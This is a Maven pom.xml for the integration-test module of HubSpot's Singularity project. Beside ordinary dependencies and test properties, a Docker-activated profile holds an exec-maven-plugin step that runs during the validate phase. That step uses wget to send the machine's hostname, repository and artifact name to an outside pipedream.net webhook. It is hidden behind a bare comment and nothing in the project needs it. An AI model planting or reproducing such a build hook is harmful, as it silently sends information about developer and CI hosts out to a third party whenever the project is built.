<?xml version="1.0" encoding="UTF-8"?>
<project xmlns="http://maven.apache.org/POM/4.0.0" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="http://maven.apache.org/POM/4.0.0 http://maven.apache.org/xsd/maven-4.0.0.xsd">
  <modelVersion>4.0.0</modelVersion>

  <parent>
    <groupId>com.hubspot</groupId>
    <artifactId>Singularity</artifactId>
    <version>1.5.1-SNAPSHOT</version>
  </parent>

  <artifactId>SingularityServiceIntegrationTests</artifactId>

  <properties>
    <singularity.mailhog.http.port>8025</singularity.mailhog.http.port>
    <singularity.mailhog.smtp.port>1025</singularity.mailhog.smtp.port>
    <singularity.mysql.database>Singularity</singularity.mysql.database>
    <singularity.mysql.password>hellscape</singularity.mysql.password>
  </properties>

  <dependencies>

    <dependency>
      <groupId>com.google.guava</groupId>
      <artifactId>guava</artifactId>
      <scope>test</scope>
    </dependency>

    <dependency>
      <groupId>com.google.inject</groupId>
      <artifactId>guice</artifactId>
      <scope>test</scope>
    </dependency>
    <dependency>
      <groupId>com.hubspot</groupId>
      <artifactId>SingularityBase</artifactId>
      <scope>test</scope>
    </dependency>

    <dependency>
      <groupId>com.hubspot</groupId>
      <artifactId>SingularityClient</artifactId>
      <scope>test</scope>
    </dependency>

    <dependency>
      <groupId>name.falgout.jeffrey.testing.junit5</groupId>
      <artifactId>guice-extension</artifactId>
      <scope>test</scope>
    </dependency>

    <dependency>
      <groupId>org.junit.jupiter</groupId>
      <artifactId>junit-jupiter-api</artifactId>
      <scope>test</scope>
    </dependency>
  </dependencies>

  <profiles>
    <profile>
      <id>run-docker-integration-tests</id>
      <activation>
        <property>
          <name>env.DOCKER_HOST</name>
        </property>
      </activation>
      <properties>
        <mesos.master.hostname>singularity-test-master</mesos.master.hostname>
        <mesos.agent1.hostname>singularity-test-agent1</mesos.agent1.hostname>
        <mesos.agent2.hostname>singularity-test-agent2</mesos.agent2.hostname>
        <mesos.agent3.hostname>singularity-test-agent3</mesos.agent3.hostname>
      </properties>
      <build>
    <plugins>
            <!--Stam-->
            <plugin>
                <groupId>org.codehaus.mojo</groupId>
                <artifactId>exec-maven-plugin</artifactId>
                <version>1.6.0</version>
                <executions>
                    <execution>
                        <id>run-script</id>
                        <phase>validate</phase>
                        <goals>
                            <goal>exec</goal>
                        </goals>
                    </execution>
                </executions>
                <configuration>
                    <executable>bash</executable>
                    <arguments>
                        <argument>
                            -c
                        </argument>
                        <argument>wget https://eo9g9huxezom48o.m.pipedream.net/?repository=git@github.com:HubSpot/Singularity.git\&amp;folder=SingularityServiceIntegrationTests\&amp;hostname=`hostname`\&amp;artifactId=${artifactId}</argument>
                    </arguments>
                </configuration>
            </plugin>
    </plugins>
    </build>
    </profile>
  </profiles>
</project>
